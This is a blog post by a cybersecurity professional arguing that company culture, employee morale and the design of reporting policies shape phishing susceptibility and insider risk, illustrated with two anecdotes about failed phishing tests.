Your Corporate Culture is Affecting Your Cybersecurity
As a cybersecurity professional, I love considering the different ways in which I can breach or affect the operation of an environment. While spending on cybersecurity technologies has increased steadily since 2011, breaches have also been increasing. So while these investments in security controls are helping reduce the risk, businesses are still falling short on one of the biggest points of exploit they have, their users.
The human factor is a generally unpredictable component when it comes to user security. Strong policies can help users better understand the rules of the road, but when the time comes for them to test their understanding, compliance can often come down to the user’s state of mind. While continuing awareness programs and user testing is one piece of the puzzle to helping make the human factor more predictable, the companies culture needs to be assessed.
Developing Insider Threats
How do your users feel about their job? Are they confident, stressed, frustrated, or depressed? How are things going for them at home? Do they feel trusted? Do they feel like they belong in the company? Does your company encourage a positive environment? Do they find value in their work? How did they respond to security training?
These are just a few of the questions you’d likely think are for Human Resources, but knowing the health of the companies culture can go far in evaluating the risk that users may get involved in a security incident. Users that are engaged with a business, involved in the culture, and driven in a shared interest of your mission, will be strong defenders. When users have a reduced value about their work environment, they will be less likely to call upon the security training, overriding their sense of suspicion and contributing to increased risks.
Situational Example
After a recent training cycle at a firm, users thought it would be amusing to click the links presented in a phishing campaign email and enter credentials. These users disarmed their suspicion because other users said a test was being conducted. The security team denied this claim but users determined they knew better. A simple DNS redirect could have turned this into a catastrophe.
Users who are disengaged from the environment or overly confident in their own abilities will be less likely to react or even properly complete training programs designed to raise their awareness, increasing risk.
Situational Example
After a recent training cycle at a firm, one of their best employees decided they knew better and didn’t need the security training. So during the training they did not pay attention and attempted to skip through in order to get a status of completed. Weeks later, this user got compromised after testing a phishing link on a virus detection site, falsely attributing that a virus is equivalent to phishing.
As you can imagine, these are just a number of reasons your users can become an insider threat without having an explicitly malicious intent. So the next time you have an opportunity to evaluate your risk, be sure to start to consider your culture. Consider how you handle diversity and inclusion, toxic environments, user complaints and requests, and how much users comprehend your policies.
The Policy Paradox
There is no disputing that strong security policies can be a good foundation for implementing physical controls and developing workflows that are more mindful of risk. Good policies can give our users confidence in the actions they take everyday and guide them to doing their part in keeping the business secure. Though policies can create risks often unconsidered.
When users run into a potential security incident, time matters. Policies that develop overly complicated mechanisms for reporting will demotivate users from reporting issues because they don’t want the hassle. If the policy adds components that are up for interpretation, then users will lose confidence in their ability to report. The process for reporting should be as efficient as possible for the user. If this means you have to develop a layer to qualify and quantify the risk, then invest in that so users can feel more confident.
If the strict policies begin to inhibit business processes, users will be tempted to bypass it to achieve a particular action or goal. Businesses often respond to these situations with adverse action on the user and then moving on to the next situation. Instead, this may be a prime opportunity for a discussion as to why a user circumvented security controls or practices. Taking the time to investigate that feedback, and working to determine ways to reduce a particular policies impact on your users, if appropriate, will not only improve relations with users, but will keep the business moving. Security should never been seen as a business obstruction.
There’s one more point to make on business culture. Your IT and security team(s) should consider each interaction with users as the first opportunity to make an impression on the user. Users that get negative responses for a false or incorrect report will be less likely to report future incidents. Users can often have nervous feelings about reporting situations, so doing our part to ease that fear will promote user engagement. Even in the case of a positive incident, its important to focus on the facts and understand how we can have done better, long before any consideration is made to blame a user.
Hopefully you’ve found a few concepts presented in this blog that can help you further evaluate the human risks in your environment that can affect your security strategies. Have others to add? Comment below!